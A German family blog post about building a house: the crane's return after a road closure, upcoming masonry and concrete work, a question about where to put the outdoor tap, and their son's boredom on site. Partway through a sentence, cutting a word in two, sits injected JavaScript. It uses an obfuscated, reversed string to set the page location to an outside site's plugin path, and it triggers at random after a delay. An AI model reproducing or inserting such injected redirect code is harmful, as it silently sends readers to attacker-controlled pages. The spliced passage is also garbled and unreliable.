Der Kran steht wieder. Nachdem am Dienstag die Straße bis zu uns freigegeben worden ist, ist heute der Kran wieder aufgebaut worden.
Das Ordnungsamt war auch sehr entgegenkommend und hat die Genehmigung mündlich erteilt, kommt dann kontrollieren, wenn der Kran steht und es fallen keine Gebühren an. Morgen wird weiteres Material geliefert, damit noch der Rest gemauert werden kann. Dienstag folgt dann die Decke, die am Donnerstag betoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toniert wird. Es kann also zügig weitergehen, um die verlorene Zeit wieder rein zu holen.
Mika kommt häufig mit zur Baustellenbesichtigung. Manchmal findet er es aber nicht so spassig.
Parallel kümmern wir uns um die Beauftragung der Kanalarbeiten und schauen hier und da nach der Innenaustattung.
Immer wieder fallen uns auch neue Dinge auf: So hatten wir die Außenzapfstelle hinten links geplant. Macht nicht wirklich Sinn, wenn wir in die Garage noch eine Brunnenpumpe stellen. Dann wäre vielleicht an die linke Hauswand im vorderen Bereich besser? Also den Vorgarten mit Stadtwasser wässern? Oder noch ein Rohr von der Brunnenpumpe bis nach vorne legen?
Wenn Euch noch etwas auffällt: Wir sind für alle Tipps dankbar! Vor allem Ding die Euch in Euren Häusern stören.
Mika findet es einfach nur zum kotzen, ständig in dem unfertigen Haus sein zu müssen.